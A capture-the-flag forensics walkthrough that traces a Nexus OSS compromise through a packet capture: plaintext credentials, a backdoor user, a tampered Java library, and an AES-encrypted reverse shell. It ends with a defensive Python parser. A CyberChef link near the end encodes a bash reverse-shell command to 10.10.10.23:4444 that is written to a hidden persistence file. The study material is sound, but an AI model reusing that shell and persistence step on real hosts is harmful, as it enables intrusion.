This is a challenge from a corporate CTF that a senior at F leaked to me so I could try it out (thanks my brother Ravi).

![image](https://hackmd.io/_uploads/SkZIwldMgl.png)

**Q1: Which credentials have been used to log in on the platform? (e.g. username:password)**

Looking through the pcap file, since the challenge asks to find credentials, I filtered for keywords like `auth`, `authentication`, ... As everything is plain HTTP, it's easy to read the payload of the auth request.

![image](https://hackmd.io/_uploads/HkZEJe8fle.png)

**Ans:** admin:dL4zyVJ1y8UhT1hX1m

**Q2: Which Nexus OSS version is in use? (e.g. 1.10.0-01)**

Looking at the response to the previous request: the server often reports its current version in the response headers.

![image](https://hackmd.io/_uploads/B1mBJg8zxg.png)

**Ans:** 2.15.1-02

**Q3: The attacker created a new user for persistence. Which credentials have been set? (e.g. username:password)**

Reading the challenge we see the words `create` and `set`. Based on basic networking knowledge, these actions are usually sent via `POST`.

![image](https://hackmd.io/_uploads/ByQjyeIfgg.png)

**Ans:** adm1n1str4t0r:46vaGuj566

**Q4: One core library written in Java has been tampered with and replaced by a malicious one. What is its package name? (e.g. com.company.name)**

Looking further into the capture file I noticed a `PUT` request uploading a `.jar` file, which looks suspicious.

![image](https://hackmd.io/_uploads/rk12lf8flx.png)

![image](https://hackmd.io/_uploads/SkpK0kLfxx.png)

**Ans:** com.phoenix.toolkit

**Q5 & Q6:**

- **The tampered library contains encrypted communication logic. What is the secret key used for session encryption? (e.g. Secret123)**
- **What is the name of the function that manages the (AES) string decryption process? (e.g. aVf41)**

It seems my suspicion was right: this file is obfuscated in the style typical of malware.
I read through and summarized it like this:

![image](https://hackmd.io/_uploads/HkNVzM8zex.png)

![image](https://hackmd.io/_uploads/Sks9RkLGle.png)

**Ans:** uJtXq5

By leveraging the fact that the key will be decrypted before use, we can print it out after it is successfully decrypted.

![image](https://hackmd.io/_uploads/Hy4sAyIMlg.png)

**Ans:** vuvtuYXvHYvW"#vu

**Q7: Which is the system command that triggered the reverse shell execution for this session running the tampered JAR? (e.g. "java .... &")**

Simple: "run it".

**Ans:** java -jar PhoenixCyberToolkit-1.0.jar

**Q8: Which is the first executed command in the encrypted reverse shell session? (e.g. whoami)**

![image](https://hackmd.io/_uploads/rk_w3YUzlx.png)

Filtering the capture down to the reverse shell session:

```
tcp && tcp.port == 4444
```

The communication data is encrypted `AES` -> `Base64`, so we just need to reverse this process :smile:

![image](https://hackmd.io/_uploads/H1Q3RtUMgl.png)

![image](https://hackmd.io/_uploads/SyhiCkUfge.png)

**Ans:** uname -a

**Q9: Which other legit user has admin permissions on the Nexus instance (excluding "adm1n1str4t0r" and "admin")? (e.g. john_doe)**

![image](https://hackmd.io/_uploads/r1qnRkIMge.png)

**Ans:** john_smith

**Q10: The attacker wrote something in a specific file to maintain persistence. What is the full path? (e.g. /path/file)**

Still basic obfuscation techniques; after decoding we can see the path used for persistence.
[![image](https://hackmd.io/_uploads/rkU001Lfxe.png)](https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true,false)AES_Decrypt(%7B'option':'UTF8','string':'vuvtuYXvHYvW%22%23vu'%7D,%7B'option':'Hex','string':''%7D,'ECB','Raw','Raw',%7B'option':'Hex','string':''%7D,%7B'option':'Hex','string':''%7D)&input=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&ieol=CRLF)

![image](https://hackmd.io/_uploads/H1RA0kUMxl.png)

![image](https://hackmd.io/_uploads/Bkv11eLfxe.png)

![image](https://hackmd.io/_uploads/rkWlkeUMge.png)

**Ans:** /sonatype-work/storage/.phoenix-updater

[recipe](https://gchq.github.io/CyberChef/#recipe=Reverse('Byte')From_Base64('A-Za-z0-9%2B/%3D',true,false)&input=PW9nY2xSWFlrQlhkdGdYYXVWMmJvQm5MdlUyWmhKM2IwTjNMckozYjMxU1p3bEhkaDUyYno5Q0k0dENJazlXYm9OR0ltWUNJeVZHZGhSR2MxMUNlcDVXWnZoR2N1OFNabkZtY3ZSM2N2c21jdmRYTGxCWGUwRm1idk4zTGc0RElpRWpKK0FESTBRRE4wOHlNeTRDTXg0Q014NENNeDhDY2pSM0wyVkdadkFpSitBU2F0QUNhekZtWWlBeWJvTlda)

*29/05/2025*
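The two decoding steps above (Q8: carve the port-4444 session and peel the Base64 layer off the AES traffic; Q10: undo the reversed Base64 around the persistence command) can be scripted with nothing but the Python standard library, which is handy when a responder has to process many captures rather than click through Wireshark and CyberChef. The block below is an added example, not code from the write-up or from the challenge: the pcap it parses, the IP addresses, the 16-byte stand-in for an AES block and the persistence blob are all constructed here, and the AES-ECB step with the Q5 key is left to CyberChef as in the write-up.

```python
"""Added example (not the write-up's code): extract one TCP session from a pcap
and undo the two wrappers seen in the capture: Base64 around the AES shell
traffic (Q8) and reversed Base64 around the persistence command (Q10).
Every packet and blob here is constructed; the AES layer is not decrypted."""
import base64
import re
import struct

PCAP_MAGIC = 0xA1B2C3D4          # classic pcap, microsecond timestamps


def build_packet(src_ip, sport, dst_ip, dport, payload):
    """Constructed Ethernet/IPv4/TCP frame (checksums zero; parser ignores them)."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 5 << 4, 0x18, 65535, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0x4000, 64, 6, 0,
                     bytes(map(int, src_ip.split("."))), bytes(map(int, dst_ip.split("."))))
    return b"\xaa" * 6 + b"\xbb" * 6 + b"\x08\x00" + ip + tcp


def build_pcap(frames):
    """Constructed pcap file: 24-byte global header, then a 16-byte header per record."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, 1)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1700000000 + i, 0, len(frame), len(frame)) + frame
    return out


def tcp_payloads(pcap_bytes, port):
    """Return (src, dst, payload) for every non-empty TCP segment on `port`,
    the programmatic equivalent of the `tcp && tcp.port == 4444` filter."""
    magic, = struct.unpack("<I", pcap_bytes[:4])
    endian = "<" if magic == PCAP_MAGIC else ">"
    linktype, = struct.unpack(endian + "I", pcap_bytes[20:24])
    if linktype != 1:
        raise ValueError("example handles Ethernet (linktype 1) captures only")
    off, results = 24, []
    while off + 16 <= len(pcap_bytes):
        _, _, incl_len, _ = struct.unpack(endian + "IIII", pcap_bytes[off:off + 16])
        frame = pcap_bytes[off + 16:off + 16 + incl_len]
        off += 16 + incl_len
        if frame[12:14] != b"\x08\x00":           # not IPv4
            continue
        ip = frame[14:]
        if ip[9] != 6:                            # not TCP
            continue
        ihl = (ip[0] & 0x0F) * 4
        total_len = struct.unpack("!H", ip[2:4])[0]
        tcp = ip[ihl:total_len]
        sport, dport = struct.unpack("!HH", tcp[:4])
        payload = tcp[(tcp[12] >> 4) * 4:]        # skip TCP header (data offset in words)
        if port in (sport, dport) and payload:
            results.append(("%d.%d.%d.%d:%d" % (*ip[12:16], sport),
                            "%d.%d.%d.%d:%d" % (*ip[16:20], dport), payload))
    return results


def strip_base64_layer(payload):
    """Q8 channel: outer Base64; what comes back is the AES ciphertext."""
    return base64.b64decode(payload.strip())


def decode_reversed_base64(blob):
    """Q10 persistence blob: the text was reversed after Base64 encoding."""
    return base64.b64decode(blob.strip()[::-1])


def paths_in_command(cmd):
    """Absolute paths a decoded command touches (what a responder checks first)."""
    return re.findall(r"/[\w./-]+", cmd)


def sample_pcap():
    """Constructed capture: two port-4444 segments carrying a 16-byte stand-in
    for an AES block, plus an unrelated HTTP request as noise."""
    inner = b"ciphertext-block"
    return build_pcap([
        build_packet("10.0.0.5", 51234, "10.0.0.9", 4444, base64.b64encode(inner)),
        build_packet("10.0.0.9", 4444, "10.0.0.5", 51234, base64.b64encode(inner)),
        build_packet("10.0.0.5", 51235, "10.0.0.9", 80, b"GET / HTTP/1.1\r\n\r\n"),
    ])


# Constructed stand-in for the Q10 blob: a command writing a hidden file.
SAMPLE_BLOB = base64.b64encode(b"echo 'EXAMPLE' > /opt/example/.updater")[::-1].decode()

if __name__ == "__main__":
    for src, dst, payload in tcp_payloads(sample_pcap(), 4444):
        print(src, "->", dst, strip_base64_layer(payload))
    cmd = decode_reversed_base64(SAMPLE_BLOB).decode()
    print(cmd, paths_in_command(cmd))
```

On a real capture, replace `sample_pcap()` with the bytes of the pcap file and feed each `strip_base64_layer` result into the AES-ECB decrypt with the Q5 key; note that pcapng files (the default Wireshark save format) use a different container and would need a different parser.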